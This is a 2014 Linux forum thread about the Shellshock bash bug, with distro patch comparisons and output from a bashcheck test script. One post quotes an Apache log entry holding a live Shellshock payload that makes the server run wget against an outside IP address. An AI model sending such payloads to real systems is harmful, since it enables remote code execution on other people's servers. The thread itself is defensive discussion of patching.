Strange... I just tried it on a x64 box and it reports the same version but does not present the date.
S.
Bash bug can let others take over your computer
Moderators: b1o, jkerr82508
- Snorkasaurus
- Berserk
- Posts: 587
- Joined: 30 Dec 2013, 19:19
- Contact:
Re: Bash bug can let others take over your computer
Yes that could be it
The patches must be mainly directed to 64bit since that is where the most servers are. Private users are not that vulnerable; that is why Apple has not even reacted yet.
The patches must be mainly directed to 64bit since that is where the most servers are. Private users are not that vulnerable; that is why Apple has not even reacted yet.
Manjaro 64bit on the main box -Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz and nVidia Corporation GT200b [GeForce GTX 275] (rev a1. + Centos on the server - Arch on the laptop.
"There are no stupid questions - Only stupid answers!"
"There are no stupid questions - Only stupid answers!"
Shellshock explained - for dummies
Here is the Shellshock (bash bug) for dummies explanation. I think it makes this understandable for "normal" people.
An I love that last remark:
An I love that last remark:
I hope you do not take advise from some guy on Youtube
Manjaro 64bit on the main box -Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz and nVidia Corporation GT200b [GeForce GTX 275] (rev a1. + Centos on the server - Arch on the laptop.
"There are no stupid questions - Only stupid answers!"
"There are no stupid questions - Only stupid answers!"
- Snorkasaurus
- Berserk
- Posts: 587
- Joined: 30 Dec 2013, 19:19
- Contact:
Re: Bash bug can let others take over your computer
Here's an entry from my Win32 Apache logs from a couple of hours ago... people can be such assholes.
S.
Code: Select all
82.221.128.246 - - [29/Sep/2014:14:03:03 -0400] "GET / HTTP/1.1" 200 53 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
S.
Re: Bash bug can let others take over your computer
Here is a bash-check from Github:
https://github.com/hannob/bashcheck/blo ... /bashcheck
Just do this and run it to check
(The script might be updated so it makes sense to repeat the command from time to time).
./bashcheck.sh will run it - it will look something like this:
The script will check for:
Manjaro is still "vulnerable" to the last two (not so serious ones - since they cannot be exploited remotely) as is Debian 7. Centos 6.5 has fixed CVE-2014-6278 so they are in the lead.
Bash is getting a good check here - so other things might turn up.
But the serious one -Shellshock - is fixed on all Linux distros (that I have tested) so the vulnerability the press has been feasting on - is gone!
If you run rkhunter (rootkit detection program) then you will get a warning regarding bash - which is only normal - so you can reset it with
https://github.com/hannob/bashcheck/blo ... /bashcheck
Just do this and run it to check
Code: Select all
wget https://raw.githubusercontent.com/hannob/bashcheck/master/bashcheck -O bashcheck.sh && chmod +x bashcheck.sh
(The script might be updated so it makes sense to repeat the command from time to time).
./bashcheck.sh will run it - it will look something like this:
The script will check for:
Manjaro is still "vulnerable" to the last two (not so serious ones - since they cannot be exploited remotely) as is Debian 7. Centos 6.5 has fixed CVE-2014-6278 so they are in the lead.
Bash is getting a good check here - so other things might turn up.
But the serious one -Shellshock - is fixed on all Linux distros (that I have tested) so the vulnerability the press has been feasting on - is gone!
If you run rkhunter (rootkit detection program) then you will get a warning regarding bash - which is only normal - so you can reset it with
Code: Select all
sudo rkhunter --propupd
Manjaro 64bit on the main box -Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz and nVidia Corporation GT200b [GeForce GTX 275] (rev a1. + Centos on the server - Arch on the laptop.
"There are no stupid questions - Only stupid answers!"
"There are no stupid questions - Only stupid answers!"
Re: Bash bug can let others take over your computer
.A follow up:
Manjaro and Arch are now completely fixed:
and it reports:
checking "the others" now
Debian 7 does still report
So they have not come as far as Arch and Manjaro - but it is no dangerous bug so..
Mageia is all good. Centos 6.5 does still report which is a no problem bug...
In OpenSUSE 13.2RC both of the bottom vulnerabilities are still open (again; no biggie)
I very much suspect that the bottom two bugs do provide some functionality that server customers rely upon - heavy server distros like Centos Debian and SUSE are very much aware of the bugs - so I doubt that it is an oversight. Patching them could maybe cause more problems than leaving them?
Manjaro and Arch are now completely fixed:
Code: Select all
./bashchek.sh
and it reports:
Code: Select all
[viking@viking60-server ~]$ ./bashcheck.sh
Testing /usr/bin/bash ...
GNU bash, version 4.3.30(1)-release (x86_64-unknown-linux-gnu)
Variable function parser pre/suffixed [%%, upstream], bugs not exploitable
Not vulnerable to CVE-2014-6271 (original shellshock)
Not vulnerable to CVE-2014-7169 (taviso bug)
Not vulnerable to CVE-2014-7186 (redir_stack bug)
Test for CVE-2014-7187 not reliable without address sanitizer
Not vulnerable to CVE-2014-6277 (lcamtuf bug #1)
Not vulnerable to CVE-2014-6278 (lcamtuf bug #2)
checking "the others" now
Debian 7 does still report
Code: Select all
Found non-exploitable CVE-2014-6277 (lcamtuf bug #1)
Found non-exploitable CVE-2014-6278 (lcamtuf bug #2)
So they have not come as far as Arch and Manjaro - but it is no dangerous bug so..
Mageia is all good. Centos 6.5 does still report
Code: Select all
Found non-exploitable CVE-2014-6277 (lcamtuf bug #1)
In OpenSUSE 13.2RC both of the bottom vulnerabilities are still open (again; no biggie)
I very much suspect that the bottom two bugs do provide some functionality that server customers rely upon - heavy server distros like Centos Debian and SUSE are very much aware of the bugs - so I doubt that it is an oversight. Patching them could maybe cause more problems than leaving them?
Manjaro 64bit on the main box -Intel(R) Core(TM) i7 CPU 920 @ 2.67GHz and nVidia Corporation GT200b [GeForce GTX 275] (rev a1. + Centos on the server - Arch on the laptop.
"There are no stupid questions - Only stupid answers!"
"There are no stupid questions - Only stupid answers!"